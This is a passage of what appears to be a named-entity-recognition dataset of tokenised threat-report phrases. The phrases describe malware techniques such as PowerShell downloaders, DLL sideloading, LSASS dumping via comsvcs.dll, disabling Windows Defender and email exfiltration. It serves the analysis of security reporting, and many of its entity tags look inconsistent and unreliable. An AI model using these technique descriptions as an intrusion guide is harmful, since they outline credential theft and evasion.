"tokens": [ - "requests", - "a", - "data", - "stream", - "from", - "the", - "C2", - "server", - "through", - "the", - "URL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "hosted", - "the", - "PowerShell", - "downloader", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "hosted", - "the", - "ZIP", - "file", - "containing", - "the", - "payloads" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "a", - "RAR", - "file." - ], - "ner_tags": [ - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "downloads", - "the", - "PowerShell", - "downloader", - "script", - "from", - "an", - "attacker-controlled", - "server" - ], - "ner_tags": [ - "B-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "a", - "ZIP", - "file" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "downloading" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "download", - "the", - "payloads" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "a", - "malicious", - "ZIP", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "drops", - "the", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "the", - "PowerShell", - "downloader", - "script", - "from", - "the", - "attacker-controlled", - "server" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "and", - "run", - "the", - "Horabot", - "“au”", - "using", - "the", - "URL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloading", - "files", - "from", - "a", - "URL" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "the", - "contents", - "of", - "an", - "HTML", - "file", - "stored", - "in", - "an", - "attacker-controlled", - "server" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "virtual", - "private", - "server", - "(VPS)", - "behind", - "which", - "the", - "attacker", - "has", - "parked", - "the", - "actual", - "command", - "and", - "control", - "(C2)", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "domain", - "name", - "also", - "resembled", - "the", - "legitimate", - "Mexican", - "Tax", - "Agency", - "domain,", - "a", - "tactic", - "the", - "attacker", - "likely", - "adopted", - "to", - "disguise", - "malicious", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "is", - "a", - "legitimate", - "AutoIt", - "interpreter." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "PowerShell", - "downloader" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "leads", - "to", - "payload", - "delivery", - "through", - "the", - "execution", - "of", - "a", - "PowerShell", - "downloader", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "RAR", - "file", - "contains", - "a", - "batch", - "file", - "with", - "a", - "CMD", - "extension" - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "it", - "through", - "the", - "PowerShell", - "commands." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloading", - "and", - "executing", - "two", - "other", - "PowerShell", - "scripts", - "from", - "a", - "different", - "attacker-controlled", - "server." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "downloader", - "script,", - "which", - "the", - "attacker", - "attempts", - "to", - "execute", - "to", - "re-infect", - "the", - "victim’s", - "machine," - ], - "ner_tags": [ - "B-Way", - "I-Tool", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "batch", - "file", - "downloads", - "the", - "PowerShell", - "downloaderThe" - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "a", - "malicious", - "batch", - "file", - "with", - "a", - ".cmd", - "extension", - "is", - "downloaded", - "to", - "the", - "user’s", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "an", - "embedded", - "PowerShell", - "command", - "to", - "download", - "the", - "next-stage", - "PowerShell", - "script", - "from", - "the", - "server", - "and", - "execute", - "it", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "two", - "other", - "malicious", - "batch", - "scripts", - "with", - "the", - "extension", - ".cmd", - "in", - "the", - "folder", - "“/Users/Public.”" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "one", - "of", - "the", - "dropped", - "batch", - "files" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "executes", - "an", - "embedded", - "PowerShell", - "command" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "another", - "dropped", - "batch", - "file," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "a", - "PowerShell", - "command" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contains", - "the", - "payload", - "DLLs", - "and", - "a", - "few", - "legitimate", - "executables", - "and", - "DLLs" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DLL", - "sideloadingThis" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "sideloading", - "to", - "legitimate", - "executables" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "run", - "the", - "payloads", - "by", - "sideloading", - "them", - "to", - "the", - "legitimate", - "executables" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sideload", - "a", - "malicious", - "DLL" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "sideload", - "the", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sideloads", - "the", - "DLL", - "to", - "the", - "AutoIt", - "interpreter", - "process" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "enticing", - "users", - "to", - "open", - "the", - "attached", - "malicious", - "HTML", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "lures", - "them", - "to", - "click", - "an", - "embedded", - "malicious", - "hyperlink", - "which" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executed", - "when", - "the", - "victim", - "opens", - "the", - "contents", - "of", - "the", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "user", - "opens", - "the", - "CMD", - "file," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "embedded", - "URL", - "is", - "launched", - "in", - "the", - "victim’s", - "browser," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "an", - "embedded", - "malicious", - "URL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "redirecting", - "to", - "another", - "malicious", - "HTML", - "file", - "from", - "an", - "attacker-controlled", - "AWS", - "EC2", - "instance." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "configured", - "to", - "run", - "the", - "payloads", - "in", - "the", - "startup", - "folder", - "of", - "the", - "victim’s", - "machine" - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "two", - "Windows", - "shortcut", - "files", - "in", - "the", - "Windows", - "startup", - "folder", - "using", - "the", - "Internet", - "Explorer", - "application", - "icon", - "and", - "the", - "target", - "paths", - "pointing", - "to", - "the", - "two", - "dropped", - "batch", - "scripts." - ], - "ner_tags": [ - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "three", - "more", - "Windows", - "shortcut", - "files", - "in", - "the", - "victim’s", - "machine", - "startup", - "folder," - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "files", - "dropped", - "in", - "the", - "Windows", - "startup", - "folder", - "are", - "run" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "launches", - "several", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "heavily", - "obfuscated", - "with", - "random", - "symbols", - "that", - "substitute", - "the", - "instructions", - "during", - "the", - "run-time", - "and", - "base64-encoded", - "strings." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "alphanumeric", - "characters", - "and", - "the", - "special", - "character", - "“_”", - "to", - "generate", - "a", - "random", - "name", - "and", - "creates", - "a", - "folder", - "with", - "the", - "random", - "name", - "in", - "the", - "root", - "directory", - "of", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "the", - "compiled", - "AutoIt", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "evade", - "detection" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "encodes", - "the", - "email", - "addresses", - "in", - "the", - "“.Outlook”", - "file", - "to", - "a", - "data", - "stream" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decodes", - "the", - "base64-encoded", - "strings", - "and", - "initializes", - "them" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "the", - "encrypted" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "decryption", - "function", - "decrypts", - "the", - "URL", - "pointing", - "to", - "the", - "attacker-controlled", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malicious", - "ZIP", - "file", - "is", - "deleted." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deleting", - "the", - "“fb”", - "folder", - "to", - "cover", - "its", - "paths", - "and", - "avoid", - "detection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "writes", - "the", - "path", - "of", - "the", - "executable", - "file,", - "“_upyqta2_Ji7.exe”,", - "to", - "the", - "class’s", - "registry", - "key", - "“HKEY_CURRENT_USER\\software\\Classes\\ms-settings\\shell\\open\\command”" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "screenshot", - "capturing" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "capturing", - "screenshots," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "capturing", - "screenshots" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "anti-virus", - "software", - "information" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Checks", - "for", - "the", - "existence", - "of", - "the", - "anti-virus", - "products", - "such", - "as", - "AVG", - "and", - "Avast", - "by", - "checking", - "for", - "the", - "DLLs", - "avghookx.dll,", - "avghooka.dll", - "and", - "snxhk.dll" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "exfiltrated", - "to", - "the", - "attacker-controlled", - "server", - "through", - "an", - "HTTP", - "POST", - "request", - "to", - "the", - "URL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exfiltrates", - "the", - "email", - "address", - "to", - "the", - "C2", - "server", - "using", - "an", - "HTTP", - "POST", - "request" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exfiltrate", - "contacts’", - "email", - "addresses" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encoded", - "email", - "addresses", - "are", - "exfiltrated" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "checking", - "if", - "a", - "file", - "on", - "the", - "victim’s", - "filesystem", - "exists", - "and", - "gets", - "the", - "file’s", - "attributes,", - "collecting", - "size", - "and", - "version", - "information," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "looks", - "for", - "the", - "Outlook", - "data", - "files", - "from", - "the", - "victim", - "profile’s", - "Outlook", - "application", - "data", - "folder." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "enumerates", - "all", - "folders", - "and", - "emails", - "in", - "the", - "victim’s", - "Outlook", - "data", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collect", - "login", - "data", - "from", - "the", - "Google", - "Chrome", - "user", - "profile", - "folders" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "extracts", - "email", - "addresses", - "from", - "the", - "emails’", - "sender,", - "recipients,", - "CC", - "and", - "BCC", - "fields." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creating", - "SQL", - "queries", - "to", - "produce", - "the", - "database", - "tables", - "to", - "store", - "the", - "stolen", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "added", - "to", - "the", - "email", - "address", - "collection", - "array." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "writes", - "the", - "extracted", - "email", - "addresses", - "from", - "the", - "array", - "to", - "a", - "file", - "called", - "“.Outlook”", - "created", - "by", - "the", - "script", - "in", - "the", - "roaming", - "user", - "profile’s", - "Microsoft", - "application", - "data", - "folder." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Checks", - "the", - "registry", - "keys", - "to", - "detect", - "virtual", - "environments", - "such", - "as", - "VMWare,", - "Virtual", - "Box,", - "Wine,", - "Microsoft", - "Hyper-V", - "or", - "Windows", - "Virtual", - "PC." - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "adversary", - "used", - "impacket", - "to", - "execute", - "Windows", - "Management", - "Instrumentation", - "(WMI)", - "to", - "achieve", - "command", - "execution", - "on", - "other", - "systems", - "present", - "in", - "the", - "environment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "examples", - "of", - "the", - "command", - "line", - "syntax", - "used", - "for", - "the", - "performance", - "of", - "this", - "activity" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "adversary", - "using", - "Windows", - "Batch", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "performed", - "via", - "the", - "following", - "command-line", - "syntax" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "command-line", - "syntax", - "used" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "command-line", - "syntax", - "was", - "observed", - "being", - "used" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "Windows", - "Command", - "Processor", - "was", - "used" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attacker", - "also", - "used", - "the", - "\"proxychains\"", - "utility,", - "which", - "is", - "often", - "employed", - "to", - "redirect", - "network", - "traffic" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "of", - "utilities", - "such", - "as", - "proxychains" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "adversary", - "leveraging", - "a", - "Windows", - "Service", - "to", - "execute", - "PowerShell", - "to", - "stay", - "persistent", - "in", - "the", - "environment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Windows", - "service", - "was", - "configured", - "with", - "the", - "following", - "options:Service", - "Type:", - "user", - "mode", - "service", - "Service", - "Start", - "Type" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "PowerShell", - "being", - "executed", - "was", - "Base64", - "encoded" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decoded", - "PowerShell", - "instructions" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting," - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "Disabling", - "PowerShell", - "logging" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Disabling", - "this", - "security", - "control" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "disable", - "remote", - "administration", - "restrictions", - "to", - "facilitate", - "lateral", - "movement", - "and", - "privilege", - "escalation", - "activities" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attacker", - "disabling", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Downloading,", - "decrypting,", - "and", - "executing", - "a", - "backdoor", - "payload", - "from", - "an", - "attacker-controlled", - "server" - ], - "ner_tags": [ - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "attacker", - "leveraging", - "Windows", - "Remote", - "Desktop", - "Connections", - "to", - "pivot", - "to", - "additional", - "systems", - "in", - "the", - "environment." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attacker", - "also", - "attempted", - "to", - "execute", - "PowerShell", - "scripts", - "on", - "remote", - "systems", - "in", - "the", - "environment", - "while", - "moving", - "system-to-system" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "adversaries", - "copied", - "and", - "executed", - "the", - "aforementioned", - "PowerShell", - "script", - "on", - "multiple", - "systems", - "across", - "the", - "environment" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comsvcs.dll", - "is", - "a", - "well-known", - "way", - "to", - "extract", - "LSASS", - "(Local", - "Security", - "Authority", - "Subsystem", - "Service)", - "data" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "invoking", - "comsvcs.dll", - "with", - "rundll32.exe,", - "an", - "adversary", - "can", - "create", - "a", - "dump", - "of", - "any", - "process" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "utilizing", - "comsvcs.dll" - ], - "ner_tags": [ - "O", - "B-Way" - ] - }, - { - "tokens": [ - "invoking", - "comsvcs.dll", - "with", - "rundll32.exe," - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "adversary", - "was", - "also", - "observed", - "remotely", - "modifying", - "the", - "Windows", - "Registry", - "on", - "remote", - "systems" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "modifying", - "the", - "Windows", - "Registry", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "adversary", - "attempting", - "to", - "exfiltrate", - "sensitive", - "information", - "over", - "SMB", - "(TCP/445)", - "directly", - "from", - "a", - "compromised", - "domain", - "controller." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actor", - "is", - "actively", - "exploiting", - "the", - "so-called", - "PrintNightmare", - "vulnerability", - "(CVE-2021-1675", - "/", - "CVE-2021-34527)", - "in", - "Windows'", - "print", - "spooler", - "service", - "to", - "spread", - "laterally", - "across", - "a", - "victim's", - "network" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "B-Features", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "screen", - "capture" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "keylogging" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "Microsoft", - "SharePoint", - "vulnerability", - "CVE-2019-0604", - "was", - "used", - "to", - "deliver", - "web", - "shells" - ], - "ner_tags": [ - "O", - "O", - "B-Exp", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exploited", - "the", - "Microsoft", - "SharePoint", - "vulnerability", - "CVE-2019-0604", - "to", - "install", - "web", - "shells" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "running", - "native", - "Windows", - "commands", - "on", - "compromised", - "servers," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "operators", - "made", - "a", - "consistent", - "effort", - "to", - "delete", - "these", - "tools", - "and", - "remove", - "any", - "residual", - "forensic", - "artifacts", - "from", - "compromised", - "systems." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "consistently", - "cleaned", - "up", - "evidence", - "of", - "their", - "intrusion", - "after", - "gaining", - "access", - "to", - "a", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "moved", - "laterally", - "and", - "deployed", - "their", - "signature", - "malware" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "this", - "access", - "to", - "deploy", - "and", - "remotely", - "execute", - "FOCUSFJORD", - "on", - "their", - "primary", - "target." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "operators", - "deleted", - "tools", - "used", - "for", - "credential", - "harvesting", - "and", - "internal", - "reconnaissance" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "delete", - "any", - "remaining", - "FOCUSFJORD", - "forensic", - "evidence,", - "including", - "files", - "on", - "disk,", - "configuration", - "data", - "encrypted", - "in", - "the", - "registry,", - "and", - "related", - "services", - "and", - "registry", - "keys", - "used", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "writes", - "its", - "encrypted", - "C2", - "configuration", - "into", - "the", - "system’s", - "registry" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "writes", - "its", - "configuration", - "to", - "registry,", - "this", - "value", - "is", - "set", - "to", - "“default”", - "and", - "is", - "later", - 